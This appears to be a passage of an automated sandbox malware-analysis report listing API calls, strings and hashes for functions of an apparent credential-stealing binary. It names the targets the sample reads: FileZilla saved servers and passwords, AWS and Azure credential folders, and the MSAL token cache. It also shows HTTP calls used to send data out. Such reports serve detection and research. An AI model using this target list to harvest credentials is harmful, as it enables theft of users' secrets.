                                                                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                  • API String ID: 337689325-514892060
                                                                                  • Opcode ID: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                                                  • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                                                                  • Opcode Fuzzy Hash: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                                                  • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                                                                  APIs
                                                                                  • lstrlen.KERNEL32(00424DA0), ref: 00B04833
                                                                                  • lstrlen.KERNEL32(00424E50), ref: 00B0483E
                                                                                  • lstrlen.KERNEL32(00424F18), ref: 00B04849
                                                                                  • lstrlen.KERNEL32(00424FD0), ref: 00B04854
                                                                                  • lstrlen.KERNEL32(00425078), ref: 00B0485F
                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B0486E
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B04875
                                                                                  • lstrlen.KERNEL32(00425120), ref: 00B04883
                                                                                  • lstrlen.KERNEL32(004251C8), ref: 00B0488E
                                                                                  • lstrlen.KERNEL32(00425270), ref: 00B04899
                                                                                  • lstrlen.KERNEL32(00425318), ref: 00B048A4
                                                                                  • lstrlen.KERNEL32(004253C0), ref: 00B048AF
                                                                                  • lstrlen.KERNEL32(00425468), ref: 00B048C3
                                                                                  • lstrlen.KERNEL32(00425510), ref: 00B048CE
                                                                                  • lstrlen.KERNEL32(004255B8), ref: 00B048D9
                                                                                  • lstrlen.KERNEL32(00425660), ref: 00B048E4
                                                                                  • lstrlen.KERNEL32(00425708), ref: 00B048EF
                                                                                  • lstrlen.KERNEL32(004257B0), ref: 00B04918
                                                                                  • lstrlen.KERNEL32(00425858), ref: 00B04923
                                                                                  • lstrlen.KERNEL32(00425920), ref: 00B0492E
                                                                                  • lstrlen.KERNEL32(004259C8), ref: 00B04939
                                                                                  • lstrlen.KERNEL32(00425A70), ref: 00B04944
                                                                                  • strlen.MSVCRT ref: 00B04957
                                                                                  • lstrlen.KERNEL32(00425B18), ref: 00B0497F
                                                                                  • lstrlen.KERNEL32(00425BC0), ref: 00B0498A
                                                                                  • lstrlen.KERNEL32(00425C68), ref: 00B04995
                                                                                  • lstrlen.KERNEL32(00425D10), ref: 00B049A0
                                                                                  • lstrlen.KERNEL32(00425DB8), ref: 00B049AB
                                                                                  • lstrlen.KERNEL32(00425E60), ref: 00B049BB
                                                                                  • lstrlen.KERNEL32(00425F08), ref: 00B049C6
                                                                                  • lstrlen.KERNEL32(00425FB0), ref: 00B049D1
                                                                                  • lstrlen.KERNEL32(00426058), ref: 00B049DC
                                                                                  • lstrlen.KERNEL32(00426100), ref: 00B049E7
                                                                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00B04A03
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                                                  • String ID:
                                                                                  • API String ID: 2127927946-0
                                                                                  • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                                                  • Instruction ID: 8b37b63ff49b49d9d5f8ec3e3e1b310d2fe4f1cd4e778ee156584a5248b65180
                                                                                  • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                                                                  • Instruction Fuzzy Hash: 0141A879740624EBC718AFE5EC89B987F71AB4C712BA0C062F90299190CBB5D5119B3E
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 00B19B08
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 00B19B21
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 00B19B39
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 00B19B51
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 00B19B6A
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 00B19B82
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 00B19B9A
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 00B19BB3
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 00B19BCB
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 00B19BE3
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 00B19BFC
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 00B19C14
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 00B19C2C
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 00B19C45
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 00B19C5D
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 00B19C75
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 00B19C8E
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 00B19CA6
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 00B19CBE
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 00B19CD7
                                                                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 00B19CEF
                                                                                  • LoadLibraryA.KERNEL32(0064A550,?,00B16C67), ref: 00B19D01
                                                                                  • LoadLibraryA.KERNEL32(0064A17C,?,00B16C67), ref: 00B19D12
                                                                                  • LoadLibraryA.KERNEL32(0064A104,?,00B16C67), ref: 00B19D24
                                                                                  • LoadLibraryA.KERNEL32(0064A1DC,?,00B16C67), ref: 00B19D36
                                                                                  • LoadLibraryA.KERNEL32(0064A328,?,00B16C67), ref: 00B19D47
                                                                                  • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 00B19D69
                                                                                  • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 00B19D8A
                                                                                  • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 00B19DA2
                                                                                  • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 00B19DC4
                                                                                  • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 00B19DE5
                                                                                  • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 00B19E06
                                                                                  • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 00B19E1D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 2238633743-0
                                                                                  • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                                                  • Instruction ID: b199df666dbd456ab216db926ebf29c6312d735fcf385c622c8561936ca560d0
                                                                                  • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                                                  • Instruction Fuzzy Hash: 52A13CBD5C0240BFE364EFE8ED889A63BFBF74E301714661AE605C3264D6399841DB52
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B19047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B19072
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B1AA4D
                                                                                    • Part of subcall function 00B09C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B09C53
                                                                                    • Part of subcall function 00B09C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B09C78
                                                                                    • Part of subcall function 00B09C27: LocalAlloc.KERNEL32(00000040,?), ref: 00B09C98
                                                                                    • Part of subcall function 00B09C27: ReadFile.KERNEL32(000000FF,?,00000000,00B016F6,00000000), ref: 00B09CC1
                                                                                    • Part of subcall function 00B09C27: LocalFree.KERNEL32(00B016F6), ref: 00B09CF7
                                                                                    • Part of subcall function 00B09C27: CloseHandle.KERNEL32(000000FF), ref: 00B09D01
                                                                                    • Part of subcall function 00B19097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B190B9
                                                                                  • strtok_s.MSVCRT ref: 00B10582
                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00B105C9
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B105D0
                                                                                  • StrStrA.SHLWAPI(00000000,00421618), ref: 00B105EC
                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B105FA
                                                                                    • Part of subcall function 00B18B47: malloc.MSVCRT ref: 00B18B4F
                                                                                    • Part of subcall function 00B18B47: strncpy.MSVCRT ref: 00B18B6A
                                                                                  • StrStrA.SHLWAPI(00000000,00421620), ref: 00B10636
                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B10644
                                                                                  • StrStrA.SHLWAPI(00000000,00421628), ref: 00B10680
                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B1068E
                                                                                  • StrStrA.SHLWAPI(00000000,00421630), ref: 00B106CA
                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B106DC
                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B10769
                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B10781
                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B10799
                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B107B1
                                                                                  • lstrcat.KERNEL32(?,0042164C), ref: 00B107C9
                                                                                  • lstrcat.KERNEL32(?,00421660), ref: 00B107D8
                                                                                  • lstrcat.KERNEL32(?,00421670), ref: 00B107E7
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B107FA
                                                                                  • lstrcat.KERNEL32(?,00421678), ref: 00B10809
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B1081C
                                                                                  • lstrcat.KERNEL32(?,0042167C), ref: 00B1082B
                                                                                  • lstrcat.KERNEL32(?,00421680), ref: 00B1083A
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B1084D
                                                                                  • lstrcat.KERNEL32(?,00421688), ref: 00B1085C
                                                                                  • lstrcat.KERNEL32(?,0042168C), ref: 00B1086B
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B1087E
                                                                                  • lstrcat.KERNEL32(?,00421698), ref: 00B1088D
                                                                                  • lstrcat.KERNEL32(?,0042169C), ref: 00B1089C
                                                                                  • strtok_s.MSVCRT ref: 00B108E0
                                                                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00B108F5
                                                                                  • memset.MSVCRT ref: 00B10944
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_b00000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                  • String ID:
                                                                                  • API String ID: 3689735781-0
                                                                                  • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                                                  • Instruction ID: 114f8bab587d5397674af8e3d9c1b89f550941d0c5bc5891cec98cf587fb77b3
                                                                                  • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                                                                  • Instruction Fuzzy Hash: 98D17275A11208ABCB04FBF0DD96EEE77B9FF14300F904499F102B6091EE74AA85CB61
                                                                                  APIs
                                                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                                                                  • StrCmpCA.SHLWAPI(?,00906260), ref: 00405A13
                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                                                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0090B890,00000000,?,008D4EE0,00000000,?,00421A1C), ref: 00405E71
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                                                                  • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                                                                  • memcpy.MSVCRT(?), ref: 00405EFE
                                                                                  • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                                                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                                                                  • HttpOpenRequestA.WININET(00000000,0090B870,?,0090B380,00000000,00000000,00400100,00000000), ref: 00405BF8
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                                                  • String ID: "$"$------$------$------
                                                                                  • API String ID: 1406981993-2180234286
                                                                                  • Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                                                  • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                                                                  • Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                                                                  • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00414D87
                                                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                                                                  • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                                                  • memset.MSVCRT ref: 00414E13
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                                                                  • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                                                  • memset.MSVCRT ref: 00414E9F
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                                                                  • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                                                    • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00906250,?,000003E8), ref: 00414A4A
                                                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                                                    • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                                                    • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                                                  • memset.MSVCRT ref: 00414F2B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                                                                  • API String ID: 4017274736-156832076
                                                                                  • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                                                  • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                                                                  • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                                                                  • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                                                                  APIs
                                                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008D4F10,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                                                                  • lstrcatA.KERNEL32(?,00000000,00906050,00421474,00906050,00421470,00000000), ref: 0040D208
                                                                                  • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                                                                  • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                                                                  • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                                                                  • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                                                                  • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                                                                  • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                                                                  • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,009045D8,?,0042110C,?,00000000), ref: 0041A82B
                                                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                                                  • lstrlenA.KERNEL32(?), ref: 0040D32A
                                                                                  • lstrlenA.KERNEL32(?), ref: 0040D339
                                                                                  • memset.MSVCRT ref: 0040D388
                                                                                    • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 00000001.00000002.2965871519.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_9B3F.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                                                                  • String ID:
                                                                                  • API String ID: 2775534915-0
                                                                                  • Opcode ID: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                                                  • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                                                                  • Opcode Fuzzy Hash: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                                                                  • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                                                                  APIs
                                                                                    • Part of subcall function 00B1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B1A9EF
                                                                                    • Part of subcall function 00B1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B1AC2C
                                                                                    • Part of subcall function 00B1AC17: lstrcpy.KERNEL32(00000000), ref: 00B1AC6B
                                                                                    • Part of subcall function 00B1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AC79
                                                                                    • Part of subcall function 00B1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B1AB6C
                                                                                    • Part of subcall function 00B18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B18DED
                                                                                    • Part of subcall function 00B1AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B1ABD9
                                                                                    • Part of subcall function 00B1AB87: lstrcat.KERNEL32(00000000), ref: 00B1ABE9
                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B0D1EA
                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B0D32E
                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B0D335
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D46F
                                                                                  • lstrcat.KERNEL32(?,00421478), ref: 00B0D47E
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D491
                                                                                  • lstrcat.KERNEL32(?,0042147C), ref: 00B0D4A0
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D4B3
                                                                                  • lstrcat.KERNEL32(?,00421480), ref: 00B0D4C2
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D4D5
                                                                                  • lstrcat.KERNEL32(?,00421484), ref: 00B0D4E4
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D4F7
                                                                                  • lstrcat.KERNEL32(?,00421488), ref: 00B0D506
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D519
                                                                                  • lstrcat.KERNEL32(?,0042148C), ref: 00B0D528
                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B0D53B
                                                                                  • lstrcat.KERNEL32(?,00421490), ref: 00B0D54A
                                                                                    • Part of subcall function 00B1AA87: lstrlen.KERNEL32(00B0516C,?,?,00B0516C,00420DDE), ref: 00B1AA92
                                                                                    • Part of subcall function 00B1AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B1AAEC
